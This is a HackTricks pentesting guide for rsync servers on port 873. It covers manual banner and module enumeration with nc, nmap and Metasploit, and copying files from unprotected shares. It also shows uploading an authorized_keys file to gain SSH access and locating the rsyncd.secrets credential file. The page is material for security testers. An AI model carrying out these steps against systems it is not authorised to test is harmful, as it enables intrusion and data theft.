873-pentesting-rsync.md (4832B)
1 --- 2 title: "873 - Pentesting Rsync" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/873-pentesting-rsync.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/873-pentesting-rsync.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 873 - Pentesting Rsync 14 15 ## **Basic Information** 16 17 `rsync` synchronizes files locally, over a remote shell such as SSH, or through the rsync daemon protocol. Its delta-transfer algorithm can reduce network traffic, while options control compression, recursion, and which metadata is preserved.<sup>[[2]](#references)</sup> 18 19 The earlier zlib and `stunnel` details remain operationally relevant. With `--compress`, current rsync versions can negotiate `zstd`, `lz4`, `zlibx`, or `zlib`; an older peer is normally assumed to support zlib. A direct rsync-daemon connection is not automatically encrypted: use the remote-shell form over SSH or a correctly authenticated TLS wrapper such as `rsync-ssl`/`stunnel` when confidentiality and server identity are required.<sup>[[2]](#references)[[4]](#references)</sup> 20 21 **Default port:** 873 22 23 ```text 24 PORT STATE SERVICE REASON 25 873/tcp open rsync syn-ack 26 ``` 27 28 ## Enumeration 29 30 ### Banner & Manual communication 31 32 ```bash 33 nc -vn 127.0.0.1 873 34 (UNKNOWN) [127.0.0.1] 873 (rsync) open 35 @RSYNCD: 31.0 <--- You receive this banner with the version from the server 36 @RSYNCD: 31.0 <--- Then you send the same info 37 #list <--- Then you ask the sever to list 38 raidroot <--- The server starts enumerating 39 USBCopy 40 NAS_Public 41 _NAS_Recycle_TOSRAID <--- Enumeration finished 42 @RSYNCD: EXIT <--- Sever closes the connection 43 44 45 #Now lets try to enumerate "raidroot" 46 nc -vn 127.0.0.1 873 47 (UNKNOWN) [127.0.0.1] 873 (rsync) open 48 @RSYNCD: 31.0 49 @RSYNCD: 31.0 50 raidroot 51 @RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password 52 ``` 53 54 ### **Enumerating Shared Folders** 55 56 **Rsync modules** are recognized as **directory shares** that might be **protected with passwords**. To identify available modules and check if they require passwords, the following commands are used:<sup>[[1]](#references)</sup> 57 58 ```bash 59 nmap -sV --script "rsync-list-modules" -p <PORT> <IP> 60 msf> use auxiliary/scanner/rsync/modules_list 61 62 # Example with IPv6 and alternate port 63 rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730 64 ``` 65 66 Be aware that some shares might not appear in the list, possibly hiding them. Additionally, accessing some shares might be restricted to specific **credentials**, indicated by an **"Access Denied"** message. 67 68 ### [**Brute Force**](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/brute-force.md#rsync) 69 70 ### Manual Rsync Usage 71 72 Upon obtaining a **module list**, actions depend on whether authentication is needed. Without authentication, **listing** and **copying** files from a shared folder to a local directory is achieved through: 73 74 ```bash 75 # Listing a shared folder 76 rsync -av --list-only rsync://192.168.0.123/shared_name 77 78 # Copying files from a shared folder 79 rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared 80 ``` 81 82 With `-a`, this process recursively transfers files and requests archive-mode metadata preservation. Actual ownership, ACL, xattr, device, and permission behavior depends on additional options and privileges.<sup>[[1]](#references)[[2]](#references)</sup> 83 84 With **credentials**, listing and downloading from a shared folder can be done as follows, where a password prompt will appear: 85 86 ```bash 87 rsync -av --list-only rsync://username@192.168.0.123/shared_name 88 rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared 89 ``` 90 91 To **upload content**, such as an _**authorized_keys**_ file for access, use: 92 93 ```bash 94 rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh 95 ``` 96 97 ## POST 98 99 To locate the rsyncd configuration file, execute: 100 101 ```bash 102 find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \) 103 ``` 104 105 Within this file, a `secrets file` parameter might point to a file containing **usernames and passwords** for rsyncd authentication. Module options also control listing, read/write access, path confinement, and allowed hosts.<sup>[[3]](#references)</sup> 106 107 ## References 108 109 - [1] [Pentesting Rsync - SmeegeSec](https://www.smeegesec.com/2016/12/pentesting-rsync.html) 110 - [2] [rsync project — `rsync(1)` manual](https://download.samba.org/pub/rsync/rsync.1) 111 - [3] [rsync project — `rsyncd.conf(5)` manual](https://download.samba.org/pub/rsync/rsyncd.conf.5) 112 - [4] [rsync project — `rsync-ssl(1)` manual](https://download.samba.org/pub/rsync/rsync-ssl.1)